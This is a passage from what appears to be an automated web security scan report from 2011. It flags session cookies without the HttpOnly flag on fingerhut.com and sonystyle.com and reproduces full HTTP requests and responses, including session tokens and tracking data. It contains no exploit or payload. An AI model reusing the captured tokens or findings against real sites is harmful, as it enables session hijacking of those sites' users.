// Output: A new instantiated S7ConfigObject instance
// Notes: No need to use this function expli
...[SNIP]...

16.13. http://www.fingerhut.com/js/financial-snapshot.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/financial-snapshot.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PIPELINE_SESSION_ID=f66ad1da7f00000107f4273150ddf97b; Expires=Sat, 03-Jun-2079 04:42:13 GMT; Path=/
JSESSIONID=9B017D05274279823C22C5D7B29D7984; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/financial-snapshot.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.fingerhut.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:28:06 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 5659
Date: Mon, 16 May 2011 01:28:06 GMT
Connection: close
Set-Cookie: PIPELINE_SESSION_ID=f66ad1da7f00000107f4273150ddf97b; Expires=Sat, 03-Jun-2079 04:42:13 GMT; Path=/
Set-Cookie: JSESSIONID=9B017D05274279823C22C5D7B29D7984; Path=/

var financialSnapshot = function() {
   $(function() {
       financialSnapshot.init();
   });
   var _p = {

rColIndex : null,
       loadAsset : function() {
           if ( $( "#financialSnapshot" ).le
...[SNIP]...

16.14. http://www.fingerhut.com/js/persistent_cart.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/persistent_cart.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PIPELINE_SESSION_ID=f66abcdf7f00000114800aa1877b3f0a; Expires=Sat, 03-Jun-2079 04:42:07 GMT; Path=/
JSESSIONID=219E43F5F60332CC31DB85B09D47C6AE; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/persistent_cart.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.fingerhut.com

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:28:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 11446
Date: Mon, 16 May 2011 01:28:01 GMT
Connection: close
Set-Cookie: PIPELINE_SESSION_ID=f66abcdf7f00000114800aa1877b3f0a; Expires=Sat, 03-Jun-2079 04:42:07 GMT; Path=/
Set-Cookie: JSESSIONID=219E43F5F60332CC31DB85B09D47C6AE; Path=/

var persistentCartCommands = new Array(8);
persistentCartCommands[0] = '/checkout/universal_cart.jsp';
persistentCartCommands[1] = '/checkout/add_item_pc.cmd';
persistentCartCommands[2] = '/che
...[SNIP]...

16.15. http://www.fingerhut.com/js/s_code.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/s_code.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PIPELINE_SESSION_ID=f66ab2147f0000017e543cb196cfa731; Expires=Sat, 03-Jun-2079 04:42:05 GMT; Path=/
JSESSIONID=5EE53F39AB67DA690F330B5C445547BB; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/s_code.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.fingerhut.com

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=1800, must-revalidate
Last-Modified: Mon, 16 May 2011 01:27:58 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 41956
Date: Mon, 16 May 2011 01:27:58 GMT
Connection: close
Set-Cookie: PIPELINE_SESSION_ID=f66ab2147f0000017e543cb196cfa731; Expires=Sat, 03-Jun-2079 04:42:05 GMT; Path=/
Set-Cookie: JSESSIONID=5EE53F39AB67DA690F330B5C445547BB; Path=/

/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

16.16. http://www.fingerhut.com/js/scene7/scene7.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/scene7/scene7.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PIPELINE_SESSION_ID=f66ac9ee7f000001419c40917dab8bc3; Expires=Sat, 03-Jun-2079 04:42:11 GMT; Path=/
JSESSIONID=F1D28BDF5FD9C544F55E952BFDAABFA3; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/scene7/scene7.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.fingerhut.com

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=1800, must-revalidate
Last-Modified: Mon, 16 May 2011 01:28:04 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 2614
Date: Mon, 16 May 2011 01:28:04 GMT
Connection: close
Set-Cookie: PIPELINE_SESSION_ID=f66ac9ee7f000001419c40917dab8bc3; Expires=Sat, 03-Jun-2079 04:42:11 GMT; Path=/
Set-Cookie: JSESSIONID=F1D28BDF5FD9C544F55E952BFDAABFA3; Path=/

(function() {
   var sj_codebase = window.sj_codebase = "http://s7isorigin3.scene7.com/is-viewers/dhtml/";
   if ( window.location.protocol == "https:" )
   { sj_codebase = "https://a248.e.akamai.net
...[SNIP]...

16.17. http://www.fingerhut.com/js/sifr.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/sifr.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PIPELINE_SESSION_ID=f66ab0637f0000017e543cb18869fc15; Expires=Sat, 03-Jun-2079 04:42:04 GMT; Path=/
JSESSIONID=14E32CA8614DC687AAE16B683087EC2A; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/sifr.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.fingerhut.com

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:27:57 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 29365
Date: Mon, 16 May 2011 01:27:57 GMT
Connection: close
Set-Cookie: PIPELINE_SESSION_ID=f66ab0637f0000017e543cb18869fc15; Expires=Sat, 03-Jun-2079 04:42:04 GMT; Path=/
Set-Cookie: JSESSIONID=14E32CA8614DC687AAE16B683087EC2A; Path=/

/*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://nov
...[SNIP]...

16.18. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/fingerhut/css/sifr-config.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B2A6DA49F1BA07C809B5419FE36EBB6F; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fingerhut/css/sifr-config.jsp HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Referer: https://www.fingerhut.com/user/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509461406; JSESSIONID=3C769805A330D33749C721314DA0795A; __g_c=w%3A1%7Cb%3A4%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 2618
Date: Mon, 16 May 2011 01:31:23 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=B2A6DA49F1BA07C809B5419FE36EBB6F; Path=/; Secure

var bellgothicbold = { src: '/fingerhut/fonts/bellgothicbold.swf' };
var bellgothic = { src: '/fingerhut/fonts/bellgothic.swf' };

//sIFR.useStyleCheck = true;
sIFR.fromLocal = true;

// Nex
...[SNIP]...

16.19. https://www.fingerhut.com/js/persistent_cart.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/js/persistent_cart.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=3BBDC68C4121949C209536AD5F994FFA; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/persistent_cart.jsp HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Referer: https://www.fingerhut.com/user/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509461406; JSESSIONID=3C769805A330D33749C721314DA0795A; __g_c=w%3A1%7Cb%3A4%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:31:16 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 11446
Date: Mon, 16 May 2011 01:31:16 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=3BBDC68C4121949C209536AD5F994FFA; Path=/; Secure

var persistentCartCommands = new Array(8);
persistentCartCommands[0] = '/checkout/universal_cart.jsp';
persistentCartCommands[1] = '/checkout/add_item_pc.cmd';
persistentCartCommands[2] = '/che
...[SNIP]...

16.20. https://www.fingerhut.com/js/s_code.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/js/s_code.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E4F591BB7C0941E3786975E360EC7FD0; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/s_code.jsp HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Referer: https://www.fingerhut.com/user/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509461406; JSESSIONID=3C769805A330D33749C721314DA0795A; __g_c=w%3A1%7Cb%3A4%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=1800, must-revalidate
Last-Modified: Mon, 16 May 2011 01:31:10 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 41956
Date: Mon, 16 May 2011 01:31:10 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=E4F591BB7C0941E3786975E360EC7FD0; Path=/; Secure

/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

16.21. https://www.fingerhut.com/js/sifr.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/js/sifr.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=3D026D7D135793FF891485765DB438A1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/sifr.jsp HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Referer: https://www.fingerhut.com/user/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509461406; JSESSIONID=3C769805A330D33749C721314DA0795A; __g_c=w%3A1%7Cb%3A4%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:31:23 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 29365
Date: Mon, 16 May 2011 01:31:23 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=3D026D7D135793FF891485765DB438A1; Path=/; Secure

/*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://nov
...[SNIP]...

16.22. https://www.fingerhut.com/user/login.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/user/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B5C80FAB7BB9405ECFD1D3237CD22862; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/login.jsp HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; JSESSIONID=3062B61ACC36E77F00F87C6AAF1929B8; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509448452; __g_c=w%3A1%7Cb%3A3%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1

Response

16.23. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000hwdv8kzP3OiBtLlip819BWg:14aelsv3e; Path=/
WC_PERSISTENT=n0FjwS6r5pu94CCixcDypwq3x3Y%3d%0a%3b2011%2d05%2d15+17%3a20%3a44%2e489%5f1305494444490%2d66937%5f0; Expires=Fri, 11 Nov 2011 21:20:44 GMT; Path=/
